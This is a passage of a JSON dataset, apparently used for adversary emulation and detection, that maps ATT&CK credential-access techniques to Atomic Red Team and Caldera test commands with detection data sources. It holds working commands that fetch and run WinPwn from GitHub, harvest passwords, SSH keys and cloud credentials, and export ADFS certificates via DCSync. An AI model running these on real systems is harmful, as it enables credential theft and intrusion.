Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsessionGopher -noninteractive -consoleoutput", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive ", + "source": 
"atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.001", + "display_name": "Unsecured Credentials: Credentials In Files", + "atomic_tests": [ + { + "name": "Extract Browser and System credentials with LaZagne", + "auto_generated_guid": "9e507bb8-1d30-4e3b-a49b-cb5727d7ea79", + "description": "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "python2 laZagne.py all\n", + "elevation_required": true, + "name": "bash" + } + }, + { + "name": "Extract passwords with grep", + "auto_generated_guid": "bd4cf0d1-7646-474e-8610-78ccf5a097c4", + "description": "Extracting credentials from files\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_path": { + "description": "Path to search", + "type": "String", + "default": "/" + } + }, + "executor": { + "command": "grep -ri password #{file_path}\n", + "name": "sh" + } + }, + { + "name": "Extracting passwords with findstr", + "auto_generated_guid": "0e56bf29-ff49-4ea5-9af4-3b81283fd513", + "description": "Extracting Credentials from Files. Upon execution, the contents of files that contain the word \"password\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "findstr /si pass *.xml *.doc *.txt *.xls\nls -R | select-string -Pattern password\n", + "name": "powershell" + } + }, + { + "name": "Access unattend.xml", + "auto_generated_guid": "367d4004-5fc0-446d-823f-960c74ae52c3", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "type C:\\Windows\\Panther\\unattend.xml\ntype C:\\Windows\\Panther\\Unattend\\unattend.xml\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Find and Access Github Credentials", + "auto_generated_guid": "da4f751a-020b-40d7-b9ff-d433b7799803", + "description": "This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done \n" + } + }, + { + "name": "WinPwn - sensitivefiles", + "auto_generated_guid": "114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0", + "description": "Search for sensitive files on this local system using the SensitiveFiles function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsensitivefiles -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - Snaffler", + "auto_generated_guid": "fdd0c913-714b-4c13-b40f-1824d6c015f2", + "description": "Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSnaffler -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + 
"name": "WinPwn - powershellsensitive", + "auto_generated_guid": "75f66e03-37d3-4704-9520-3210efbe33ce", + "description": "Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowershellsensitive -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - passhunt", + "auto_generated_guid": "00e3e3c7-6c3c-455e-bd4b-461c7f0e7797", + "description": "Search for Passwords on this system using passhunt via WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npasshunt -local $true -noninteractive", + "cleanup_command": "rm -force .\\passhunt.exe -ErrorAction Ignore\nrm -force .\\phunter* -ErrorAction Ignore\nrm -force -recurse .\\DomainRecon -ErrorAction Ignore\nrm -force -recurse .\\Exploitation -ErrorAction Ignore\nrm -force -recurse .\\LocalPrivEsc -ErrorAction Ignore\nrm -force -recurse .\\LocalRecon -ErrorAction Ignore\nrm -force -recurse .\\Vulnerabilities -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "WinPwn - SessionGopher", + "auto_generated_guid": "c9dc9de3-f961-4284-bd2d-f959c9f9fda5", + "description": "Launches SessionGopher on this system via WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsessionGopher -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials", + "auto_generated_guid": "aaa87b0e-5232-4649-ae5c-f1724a4b2798", + "description": "Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + 
"https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.002", + "command_list": [ + "reg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n", + "reg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s\n", + "reg query HKCU /f password /t REG_SZ /s\n", + "reg query HKLM /f password /t REG_SZ /s\n" + ], + "commands": [ + { + "command": "reg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n", + "source": "atomics/T1552.002/T1552.002.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials in Registry" + }, + { + "command": "reg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s\n", + "source": "atomics/T1552.002/T1552.002.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials in Registry" + }, + { + "command": "reg query HKCU /f password /t REG_SZ /s\n", + "source": "data/abilities/credential-access/3aad5312-d48b-4206-9de4-39866c12e60f.yml", + "name": "Search for possible credentials stored in Registry" + }, + { + "command": "reg query HKLM /f password /t REG_SZ /s\n", + "source": "data/abilities/credential-access/98e58fc4-3843-4511-89b1-50cb872e0c9b.yml", + "name": "Search for possible credentials stored in the HKLM Hive" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.002", + "display_name": "Unsecured Credentials: Credentials in Registry", + "atomic_tests": [ + { + "name": "Enumeration for Credentials in Registry", + "auto_generated_guid": "b6ec082c-7384-46b3-a111-9a9b8b14e5e7", + "description": "Queries to enumerate for credentials in the Registry. 
Upon execution, any registry key containing the word \"password\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n", + "name": "command_prompt" + } + }, + { + "name": "Enumeration for PuTTY Credentials in Registry", + "auto_generated_guid": "af197fd7-e868-448e-9bd5-05d1bcd9d9e5", + "description": "Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry\nentries are found, they will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "3aad5312-d48b-4206-9de4-39866c12e60f", + "name": "Credentials in Registry - HKCU", + "description": "Search for possible credentials stored in Registry", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.002", + "name": "Unsecured Credentials: Credentials in Registry" + }, + "platforms": { + "windows": { + "psh": { + "command": "reg query HKCU /f password /t REG_SZ /s\n" + } + } + } + }, + { + "id": "98e58fc4-3843-4511-89b1-50cb872e0c9b", + "name": "Credentials in Registry - HKLM", + "description": "Search for possible credentials stored in the HKLM Hive", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.002", + "name": "Unsecured Credentials: Credentials in Registry" + }, + "platforms": { + "windows": { + "psh": { + "command": "reg query HKLM /f password /t REG_SZ /s\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + 
"description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through 
a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + } + ], + "external_reference": [ + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1552.003", + "command_list": [ + "cat #{bash_history_filename} | grep #{bash_history_grep_args} > ~/loot.txt\n", + "cat #{bash_history_filename} | grep -e '-p ' -e 'pass' -e 'ssh' > #{output_file}\n", + "cat ~/.bash_history | grep #{bash_history_grep_args} > #{output_file}\n", + "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", + "cat ~/.bash_history" + ], + "commands": [ + { + "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > ~/loot.txt\n", + "source": "atomics/T1552.003/T1552.003.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Bash History" + }, + { + "command": "cat #{bash_history_filename} | grep -e '-p ' -e 'pass' -e 'ssh' > #{output_file}\n", + "source": "atomics/T1552.003/T1552.003.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Bash History" + }, + { + "command": "cat ~/.bash_history | grep #{bash_history_grep_args} > #{output_file}\n", + "source": "atomics/T1552.003/T1552.003.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Bash History" + }, + { + "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", + "source": "data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml", + "name": "Get contents of bash history" + }, + { + "command": "cat ~/.bash_history", + "source": "data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml", + "name": "Get contents of bash history" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.003", + "display_name": "Unsecured Credentials: Bash History", + "atomic_tests": [ + { + "name": "Search Through Bash History", + "auto_generated_guid": 
"3cfde62b-7c33-4b26-a61e-755d6131c8ce", + "description": "Search through bash history for specifice commands we want to capture\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "~/loot.txt" + }, + "bash_history_grep_args": { + "description": "grep arguments that filter out specific commands we want to capture", + "type": "Path", + "default": "-e '-p ' -e 'pass' -e 'ssh'" + }, + "bash_history_filename": { + "description": "Path of the bash history file to capture", + "type": "Path", + "default": "~/.bash_history" + } + }, + "executor": { + "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}\n", + "name": "sh" + } + } + ] + }, + { + "id": "422526ec-27e9-429a-995b-c686a29561a4", + "name": "Dump history", + "description": "Get contents of bash history", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.003", + "name": "Unsecured Credentials: Bash History" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "cat ~/.bash_history", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + 
"https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.004", + "command_list": [ + "dir c:\\ /b /s .key | findstr /e .key\n", + "find / -name id_rsa >> #{output_file}\n", + "find #{search_path} -name id_rsa >> /tmp/keyfile_locations.txt\n", + "mkdir #{output_folder}\nfind / -name id_rsa -exec cp --parents {} #{output_folder} \\;\n", + "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec cp --parents {} /tmp/art-staging \\;\n", + "mkdir #{output_folder}\nfind / -name id_rsa -exec rsync -R {} #{output_folder} \\;\n", + "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec rsync -R {} /tmp/art-staging \\;\n", + "mkdir #{output_folder}\nfind / -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \\;\n", + "mkdir /tmp/GnuPG\nfind #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} /tmp/GnuPG \\;\n", + "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"adfs_svc\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = 
$Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList Administrator, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = 
$Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"ReallyStrongPassword\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = 
$Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server sts.contoso.com\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = 
